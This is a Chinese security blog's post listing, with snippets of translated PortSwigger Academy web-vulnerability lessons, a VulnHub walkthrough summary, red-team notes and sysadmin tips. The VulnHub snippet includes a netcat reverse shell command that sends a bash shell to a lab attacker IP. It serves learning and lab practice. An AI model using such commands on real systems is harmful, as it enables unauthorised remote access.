- 博客(16)
- 资源 (2)
- 收藏
- 关注
RSS订阅原创 PortSwigger Academy | Cross-site request forgery (CSRF) : 跨站请求伪造
文章目录什么是CSRF?CSRF攻击有什么影响?CSRF如何工作?使用SameSite Cookie防御CSRF如何构造CSRF攻击Lab: CSRF vulnerability with no defenses如何进行CSRF攻击XSS vs CSRFXSS和CSRF有什么区别?CSRF令牌可以阻止XSS攻击吗?防止CSRF攻击CSRF token什么是CSRF令牌?CSRF令牌应如何生成?CSRF令牌应如何传输?CSRF令牌应如何验证?常见的CSRF漏洞CSRF令牌的验证取决于请求方法Lab: CSRF
2021-02-02 16:28:18
1696
原创 PortSwigger Academy | XML external entity (XXE) injection : XML外部实体注入
文章目录什么是XML外部实体注入?XXE漏洞如何产生?XML实体什么是XML?什么是XML实体?什么是文件类型定义?什么是XML自定义实体?什么是XML外部实体?XXE攻击有哪些类型?在本节中,我们将解释什么是XML外部实体注入,描述一些常见的示例,解释如何发现和利用各种XXE注入,并总结如何防止XXE注入攻击。什么是XML外部实体注入?XML外部实体注入(也称为XXE)是一个网络安全漏洞,它使攻击者能够干扰应用程序对XML数据的处理。 它通常使攻击者可以查看应用程序服务器文件系统上的文件,并与应用程
2021-02-01 18:01:38
1562
1
原创 PortSwigger Academy | Information disclosure vulnerabilities : 信息泄漏漏洞
11111111111111
2021-01-27 11:04:45
2034
2
原创 PortSwigger Academy | Access control : 访问控制
文章目录总结访问控制是什么?垂直访问控制水平访问控制上下文相关的访问控制损坏的访问控制示例垂直特权升级未受保护的功能Lab: Unprotected admin functionalityLab: Unprotected admin functionality with unpredictable URL基于参数的访问控制方法Lab: User role controlled by request parameterLab: User role can be modified in user profile
2021-01-27 11:03:56
2064
1
原创 PortSwigger Academy | Server-side request forgery (SSRF) : 服务器端请求伪造
文章目录总结什么是SSRF?SSRF攻击有什么影响?常见的SSRF攻击针对服务器本身的SSRF攻击Lab: Basic SSRF against the local serverSSRF攻击其他后端系统Lab: Basic SSRF against another back-end system规避SSRF的常见防御措施具有基于黑名单的输入过滤器的SSRFLab: SSRF with blacklist-based input filter具有基于白名单的输入过滤器的SSRFLab: SSRF with w
2021-01-27 11:03:19
1454
原创 PortSwigger Academy | OS command injection : 操作系统命令注入
文章目录总结什么是OS命令注入?执行任意命令Lab: OS command injection, simple case有用的命令操作系统命令注入漏洞盲注使用时间延迟检测盲注OS命令注入Lab: Blind OS command injection with time delays通过重定向输出来利用盲注OS命令注入Lab: Blind OS command injection with output redirection利用带外(OAST)技术利用盲目的OS命令注入Lab: Blind OS comma
2021-01-14 22:17:27
1225
原创 PortSwigger Academy | Directory traversal : 目录遍历
文章目录总结目录遍历是什么?通过目录遍历读取任意文件Lab: File path traversal, simple case利用文件路径遍历漏洞的常见障碍Lab: File path traversal, traversal sequences blocked with absolute path bypassLab: File path traversal, traversal sequences stripped non-recursivelyLab: File path traversal, tra
2021-01-14 22:14:57
557
1
原创 PortSwigger Academy | Authentication : 身份认证
文章目录什么是身份验证?身份验证和授权有什么区别?身份验证漏洞是如何产生的?易受攻击的身份验证有何影响?身份验证机制中的漏洞 ↓第三方身份验证机制中的漏洞防止对您自己的身份验证机制的攻击 ↓如何保护身份验证机制注意用户凭据不要指望用户来保证安全防止用户名枚举实施强大的暴力破解保护反复检查验证逻辑别忘了补充功能实施适当的多因素身份验证在本节中,我们将介绍一些网站使用的最常见的身份验证机制,并讨论其中的潜在漏洞。我们将重点介绍不同身份验证机制中的固有漏洞,以及由于身份验证的不恰当实现而引入的一些典型漏洞。最
2021-01-14 21:56:14
3478
2
原创 PortSwigger Academy | HTTP Host header attacks : HTTP Host头攻击
本文地址:文章目录总结:1.什么是HTTP Host头攻击?: What is the HTTP Host header?2.HTTP Host标头的目的是什么?: What is the purpose of the HTTP Host header?虚拟主机: Virtual hosting通过中介路由流量: Routing traffic via an intermediaryHTTP Host标头如何解决此问题?: How does the HTTP Host header solve this
2020-12-30 14:14:32
1283
3
原创 PortSwigger Academy | business logic vulnerabilities : 业务逻辑漏洞
文章目录例子过分信任客户端控件例子过分信任客户端控件一个根本有缺陷的假设是,用户将仅通过提供的Web界面与应用程序进行交互。 这特别危险,因为它导致进一步的假设,即客户端验证将阻止用户提供恶意输入。 但是,攻击者可以简单地使用诸如Burp Proxy之类的工具来篡改数据,这些数据是在浏览器发送完之后,然后再传递到服务器端逻辑中的。 这有效地使客户端控件变得无用。在不执行适当的完整性检查和服务器端验证的情况下,接受具有实际价值的数据可以使攻击者以相对较少的精力进行各种破坏。 他们究竟能实现什么取决于功
2020-11-20 17:49:20
1683
1
原创 Slow HTTP Denial of Service Attack | 如何证明
文章目录前言Slow HTTP Denial of Service AttackVulnerability descriptionAttack detailsThe impact of this vulnerabilityHow to fix this vulnerabilityClassificationWeb References前言今天用扫描器给客户做扫描,然后AWVS报了个慢速HTTP拒绝服务攻击为了方便大家复制,文字版的也放在下面Slow HTTP Denial of Service A
2020-09-25 15:13:06
4124
2
原创 vulnhub | BROKEN-2020: 1
文章目录总结前言开始总结- 0. arp 扫描 | netdiscover -i eth0 | arp-scan --interface=eth0 --localnet- 0.1 查看定时任务 | cat /etc/crontab- 1. python 开启一个http服务器 | python3 -m http.server 8080- 2. nc 开启监听 | nc -lvp 4444- 3. nc 反弹shell | nc -e /bin/bash 10.0.2.4 4444-
2020-09-07 16:08:37
556
原创 《渗透攻击红队百科全书》--笔记
目录1.前言1.1红队(RedTeam)1.2网络攻击杀伤链(Cyber kill Chain)1.3 MITRE ATT&CK1.前言1.1红队(RedTeam)自动化的发起大规模、海量节点的实战攻击,以便测试用户在各个业务场景的应急响应能力。1.2网络攻击杀伤链(Cyber kill Chain)杀伤链共有发现-定位-跟踪-瞄准-打击-达成目标六个环节,在越早的杀伤链环节阻止攻击,防护效果就越好。例如,攻击者取得的信息越少,这些信息被第三人利用来发起进攻的可能性也会越低。参考:htt
2020-08-14 23:25:50
8777
8
原创 为CentOS换源
首先备份/etc/yum.repos.d/CentOS-Base.repomv /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.backup下载对应版本repo文件, 放入/etc/yum.repos.d/(操作前请做好相应备份)CentOS7CentOS6CentOS5可以使用wget命令来下...
2019-03-12 17:23:05
182
原创 使用pipenv install出现utf-8不能decode的问题
报错的大致内容:UnicodeDecodeError: ‘utf-8’ codec can’t decode byte 0xb6 in position 0: invalid start byte这是我的报错:F:\fisher>pipenv installTraceback (most recent call last): File "f:\python3\lib\runpy.p...
2019-03-12 16:27:29
1033
Django文档英文版-电纸书格式
2019-04-22
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人